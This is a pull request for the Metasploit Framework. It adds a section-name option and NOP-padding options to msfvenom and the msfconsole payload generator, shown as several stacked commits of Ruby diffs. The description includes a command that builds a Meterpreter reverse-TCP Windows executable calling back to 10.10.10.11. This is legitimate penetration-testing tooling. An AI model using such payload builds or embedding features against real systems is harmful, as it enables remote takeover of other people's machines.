### PR TITLE
Add opt --sec-name for msfvenom; Implement -S, -P for cmd dispatcher

### DIFF
--- a/lib/msf/base/simple/payload.rb
+++ b/lib/msf/base/simple/payload.rb
@@ -53,6 +53,7 @@ module Payload
     e = EncodedPayload.create(payload,
         'BadChars'    => opts['BadChars'],
         'MinNops'     => opts['NopSledSize'],
+        'PadNops'     => opts['PadNops'],
         'Encoder'     => opts['Encoder'],
         'Iterations'  => opts['Iterations'],
         'ForceEncode' => opts['ForceEncode'],
@@ -64,7 +65,8 @@ module Payload
     exeopts = {
       :inject => opts['KeepTemplateWorking'],
       :template => opts['Template'],
-      :template_path => opts['ExeDir']
+      :template_path => opts['ExeDir'],
+      :secname => opts['SecName']
     }
 
     arch = payload.arch

--- a/lib/msf/core/encoded_payload.rb
+++ b/lib/msf/core/encoded_payload.rb
@@ -290,6 +290,7 @@ class EncodedPayload
   def generate_sled
     min   = reqs['MinNops'] || 0
     space = reqs['Space']
+    pad_nops = reqs['PadNops']
 
     self.nop_sled_size = min
 
@@ -309,6 +310,9 @@ class EncodedPayload
 
     # Check for the DisableNops setting
     self.nop_sled_size = 0 if reqs['DisableNops']
+
+    # Check for the PadNops setting
+    self.nop_sled_size = (pad_nops - self.encoded.length) if reqs['PadNops']
 
     # Now construct the actual sled
     if (self.nop_sled_size > 0)
@@ -338,7 +342,6 @@ class EncodedPayload
 
         begin
           nop.copy_ui(pinst)
-
           self.nop_sled = nop.generate_sled(self.nop_sled_size,
             'BadChars'      => reqs['BadChars'],
             'SaveRegisters' => save_regs)

--- a/lib/msf/core/exe/segment_appender.rb
+++ b/lib/msf/core/exe/segment_appender.rb
@@ -32,13 +32,13 @@ module Exe
 
       # Create a new section
       s = Metasm::PE::Section.new
-			if @secname.blank?
-      	s.name = '.' + Rex::Text.rand_text_alpha_lower(4)
+      if secname.blank?
+        s.name = '.' + Rex::Text.rand_text_alpha_lower(4)
       else
-				s.name = '.' + @secname
-				$stderr.puts "Created custom section \".#{secname}\""
-			end
-			s.encoded = payload_stub prefix
+        s.name = '.' + secname.downcase
+        $stderr.puts "Created custom section \"#{s.name}\""
+      end
+      s.encoded = payload_stub prefix
       s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
 
       pe.sections << s

--- a/lib/msf/core/exe/segment_appender.rb
+++ b/lib/msf/core/exe/segment_appender.rb
@@ -32,8 +32,13 @@ module Exe
 
       # Create a new section
       s = Metasm::PE::Section.new
-      s.name = '.' + Rex::Text.rand_text_alpha_lower(4)
-      s.encoded = payload_stub prefix
+			if @secname.blank?
+      	s.name = '.' + Rex::Text.rand_text_alpha_lower(4)
+      else
+				s.name = '.' + @secname
+				$stderr.puts "Created custom section \".#{secname}\""
+			end
+			s.encoded = payload_stub prefix
       s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
 
       pe.sections << s

--- a/lib/msf/core/exe/segment_appender.rb
+++ b/lib/msf/core/exe/segment_appender.rb
@@ -36,7 +36,6 @@ module Exe
         s.name = '.' + Rex::Text.rand_text_alpha_lower(4)
       else
         s.name = '.' + secname.downcase
-        $stderr.puts "Created custom section \"#{s.name}\""
       end
       s.encoded = payload_stub prefix
       s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]

--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -10,13 +10,14 @@ module Exe
     attr_accessor :template
     attr_accessor :arch
     attr_accessor :buffer_register
+		attr_accessor :secname
 
     def initialize(opts = {})
       @payload = opts[:payload]
       @template = opts[:template]
       @arch  = opts[:arch] || :x86
       @buffer_register = opts[:buffer_register]
-
+			@secname = opts[:secname]
       x86_regs = %w{eax ecx edx ebx edi esi}
       x64_regs = %w{rax rcx rdx rbx rdi rsi} + (8..15).map{|n| "r#{n}" }
 

--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -10,14 +10,14 @@ module Exe
     attr_accessor :template
     attr_accessor :arch
     attr_accessor :buffer_register
-		attr_accessor :secname
+    attr_accessor :secname
 
     def initialize(opts = {})
       @payload = opts[:payload]
       @template = opts[:template]
       @arch  = opts[:arch] || :x86
       @buffer_register = opts[:buffer_register]
-			@secname = opts[:secname]
+      @secname = opts[:secname]
       x86_regs = %w{eax ecx edx ebx edi esi}
       x64_regs = %w{rax rcx rdx rbx rdi rsi} + (8..15).map{|n| "r#{n}" }
 

--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -290,9 +290,9 @@ module Msf
         opts[:template_path] = File.dirname(template)
         opts[:template]      = File.basename(template)
       end
-			unless secname.blank?
-				opts[:secname]			 = secname
-			end
+      unless secname.blank?
+        opts[:secname]       = secname
+      end
       opts
     end
 

--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -44,7 +44,7 @@ module Msf
     # @!attribute  encoder
     #   @return [String] The encoder(s) you want applied to the payload
     attr_accessor :encoder
-		# @!attribute  secname
+    # @!attribute  secname
     #   @return [String] The name of the new section within the generated Windows binary
     attr_accessor :secname
     # @!attribute  format
@@ -104,7 +104,7 @@ module Msf
     # @option opts [String] :payload (see #payload)
     # @option opts [String] :format (see #format)
     # @option opts [String] :encoder (see #encoder)
-		# @option opts [String] :secname (see #secname)
+    # @option opts [String] :secname (see #secname)
     # @option opts [Integer] :iterations (see #iterations)
     # @option opts [String] :arch (see #arch)
     # @option opts [String] :platform (see #platform)
@@ -128,7 +128,7 @@ module Msf
       @cli        = opts.fetch(:cli, false)
       @datastore  = opts.fetch(:datastore, {})
       @encoder    = opts.fetch(:encoder, '')
-			@secname    = opts.fetch(:secname, '')
+      @secname    = opts.fetch(:secname, '')
       @format     = opts.fetch(:format, 'raw')
       @iterations = opts.fetch(:iterations, 1)
       @keep       = opts.fetch(:keep, false)
@@ -291,7 +291,7 @@ module Msf
         opts[:template]      = File.basename(template)
       end
 			unless secname.blank?
-				opts[:secname]			 = @secname
+				opts[:secname]			 = secname
 			end
       opts
     end

--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -44,6 +44,9 @@ module Msf
     # @!attribute  encoder
     #   @return [String] The encoder(s) you want applied to the payload
     attr_accessor :encoder
+		# @!attribute  secname
+    #   @return [String] The name of the new section within the generated Windows binary
+    attr_accessor :secname
     # @!attribute  format
     #   @return [String] The format you want the payload returned in
     attr_accessor :format
@@ -101,6 +104,7 @@ module Msf
     # @option opts [String] :payload (see #payload)
     # @option opts [String] :format (see #format)
     # @option opts [String] :encoder (see #encoder)
+		# @option opts [String] :secname (see #secname)
     # @option opts [Integer] :iterations (see #iterations)
     # @option opts [String] :arch (see #arch)
     # @option opts [String] :platform (see #platform)
@@ -124,6 +128,7 @@ module Msf
       @cli        = opts.fetch(:cli, false)
       @datastore  = opts.fetch(:datastore, {})
       @encoder    = opts.fetch(:encoder, '')
+			@secname    = opts.fetch(:secname, '')
       @format     = opts.fetch(:format, 'raw')
       @iterations = opts.fetch(:iterations, 1)
       @keep       = opts.fetch(:keep, false)
@@ -285,6 +290,9 @@ module Msf
         opts[:template_path] = File.dirname(template)
         opts[:template]      = File.basename(template)
       end
+			unless secname.blank?
+				opts[:secname]			 = @secname
+			end
       opts
     end
 

--- a/lib/msf/ui/console/command_dispatcher/payload.rb
+++ b/lib/msf/ui/console/command_dispatcher/payload.rb
@@ -24,6 +24,8 @@ module Msf
             "-E" => [ false, "Force encoding" ],
             "-e" => [ true,  "The encoder to use" ],
             "-s" => [ true,  "NOP sled length."                                     ],
+            "-P" => [ true,  "Total desired payload size, auto-produce approproate NOPsled length"],
+            "-S" => [ true,  "The new section name to use when generating (large) Windows binaries"],
             "-b" => [ true,  "The list of characters to avoid example: '\\x00\\xff'" ],
             "-i" => [ true,  "The number of times to encode the payload" ],
             "-x" => [ true,  "Specify a custom executable file to use as a template" ],
@@ -82,6 +84,8 @@ module Msf
             # Parse the arguments
             encoder_name = nil
             sled_size    = nil
+            pad_nops     = nil
+            sec_name     = nil
             option_str   = nil
             badchars     = nil
             format       = "ruby"
@@ -102,6 +106,10 @@ module Msf
                 force = true
               when '-n'
                 sled_size = val.to_i
+              when '-P'
+                pad_nops = val.to_i
+              when '-S'
+                sec_name = val
               when '-f'
                 format = val
               when '-o'
@@ -146,6 +154,8 @@ module Msf
                 'Encoder'     => encoder_name,
                 'Format'      => format,
                 'NopSledSize' => sled_size,
+                'PadNops'     => pad_nops,
+                'SecName'     => sec_name,
                 'OptionStr'   => option_str,
                 'ForceEncode' => force,
                 'Template'    => template,
@@ -178,6 +188,8 @@ module Msf
               '-h' => [ nil                                               ],
               '-o' => [ true                                              ],
               '-s' => [ true                                              ],
+              '-P' => [ true                                              ],
+              '-S' => [ true                                              ],
               '-f' => [ :file                                             ],
               '-t' => [ @@supported_formats                               ],
               '-p' => [ true                                              ],

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -249,7 +249,8 @@ require 'msf/core/exe/segment_appender'
       injector = Msf::Exe::SegmentInjector.new({
           :payload  => code,
           :template => opts[:template],
-          :arch     => :x86
+          :arch     => :x86,
+					:secname  => opts[:secname]
       })
       return injector.generate_pe
     end
@@ -270,7 +271,8 @@ require 'msf/core/exe/segment_appender'
       appender = Msf::Exe::SegmentAppender.new({
           :payload  => code,
           :template => opts[:template],
-          :arch     => :x86
+          :arch     => :x86,
+					:secname  => opts[:secname]
       })
       return appender.generate_pe
     end
@@ -603,7 +605,8 @@ require 'msf/core/exe/segment_appender'
       injector = Msf::Exe::SegmentInjector.new({
          :payload  => code,
          :template => opts[:template],
-         :arch     => :x64
+         :arch     => :x64,
+				 :secname  => opts[:secname]
       })
       return injector.generate_pe
     end
@@ -612,7 +615,8 @@ require 'msf/core/exe/segment_appender'
     appender = Msf::Exe::SegmentAppender.new({
       :payload  => code,
       :template => opts[:template],
-      :arch     => :x64
+      :arch     => :x64,
+			:secname	=> opts[:secname]
     })
     return appender.generate_pe
   end

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -250,7 +250,7 @@ require 'msf/core/exe/segment_appender'
           :payload  => code,
           :template => opts[:template],
           :arch     => :x86,
-					:secname  => opts[:secname]
+          :secname  => opts[:secname]
       })
       return injector.generate_pe
     end
@@ -272,7 +272,7 @@ require 'msf/core/exe/segment_appender'
           :payload  => code,
           :template => opts[:template],
           :arch     => :x86,
-					:secname  => opts[:secname]
+          :secname  => opts[:secname]
       })
       return appender.generate_pe
     end
@@ -606,7 +606,7 @@ require 'msf/core/exe/segment_appender'
          :payload  => code,
          :template => opts[:template],
          :arch     => :x64,
-				 :secname  => opts[:secname]
+         :secname  => opts[:secname]
       })
       return injector.generate_pe
     end
@@ -616,7 +616,7 @@ require 'msf/core/exe/segment_appender'
       :payload  => code,
       :template => opts[:template],
       :arch     => :x64,
-			:secname	=> opts[:secname]
+      :secname	=> opts[:secname]
     })
     return appender.generate_pe
   end

--- a/msfvenom
+++ b/msfvenom
@@ -97,7 +97,7 @@ def parse_args(args)
     opts[:encoder] = e
   end
 
-	opt.on('--sec-name        <value>', String, 'The new section name to use when generating Windows binaries. Default: random 4-character alpha string') do |s|
+  opt.on('--sec-name        <value>', String, 'The new section name to use when generating Windows binaries. Default: random 4-character alpha string') do |s|
     opts[:secname] = s
   end
 

--- a/msfvenom
+++ b/msfvenom
@@ -97,6 +97,10 @@ def parse_args(args)
     opts[:encoder] = e
   end
 
+	opt.on('--sec-name        <value>', String, 'The new section name to use when generating Windows binaries. Default: random 4-character alpha string') do |s|
+    opts[:secname] = s
+  end
+
   opt.on('--smallest', 'Generate the smallest possible payload using all available encoders') do
     opts[:smallest] = true
   end

--- a/msfvenom
+++ b/msfvenom
@@ -97,7 +97,7 @@ def parse_args(args)
     opts[:encoder] = e
   end
 
-  opt.on('--sec-name        <value>', String, 'The new section name to use when generating Windows binaries. Default: random 4-character alpha string') do |s|
+  opt.on('--sec-name        <value>', String, 'The new section name to use when generating large Windows binaries. Default: random 4-character alpha string') do |s|
     opts[:secname] = s
   end
 
@@ -138,7 +138,7 @@ def parse_args(args)
     opts[:nops] = n.to_i
   end
 
-  opt.on('--pad-nops', 'Use nopsled size specified by -n <length> as the total payload size, thus performing a subtraction to prepend a nopsled of quantity (nops minus payload length)') do
+  opt.on('--pad-nops', 'Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)') do
     opts[:padnops] = true
   end
 


### PR DESCRIPTION
Add option `--sec-name <String>` to `msfvenom` to give the user the ability to specify a custom section header name when generating (large) Windows binaries that require a new section to fit the payload. Resolves [#6637](https://github.com/rapid7/metasploit-framework/issues/6637)

Implement `--sec-name` and [`--pad-nops`](https://github.com/rapid7/metasploit-framework/pull/10872) for `msfconsole` command dispatcher (to use on a payload module directly).

To keep things clean, no console output was added/modified in these implementations (aside from option help menus).

## msfvenom Verification
- [x] Run `msfvenom` with `--sec-name` option on the console.

### Console Output
```
vader@deathstar:~/git/metasploit-framework$ ./msfvenom --sec-name pdata -p windows/meterpreter_reverse_tcp LHOST=10.10.10.11 -f exe -o /tmp/stageless8000.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 179779 bytes
Final size of exe file: 254976 bytes
Saved as: /tmp/stageless8000.exe
```
In the above example, the user specifies a new section header name "pdata" when generating a stageless payload with the default template.

To verify the section name was added to the PE, you can open the .exe in a PE viewer, such as CFF Explorer, [as shown in this screenshot](https://i.imgur.com/IjuBTyz.jpg).

## Command dispatcher verification
- [x] Run `msfconsole` and use a payload. Set necessary parameters.
- [x] Run `generate` on any payload module with options -S (section name) or -P (pad nops).

[Here's an example of -P.](https://imgur.com/dEPto2z) Notice the `diff` output; 100 bytes is a result of `-S 100` option, automatically prepending (100-63=37) nops.

[Here's an example of -S.](https://imgur.com/DsXHsZO)

And here's proof that the above example command `generate -S pdata -f exe -o secname-cmddispatch.exe` generates the correct section header name: [screenshot](https://imgur.com/Me8qKW1)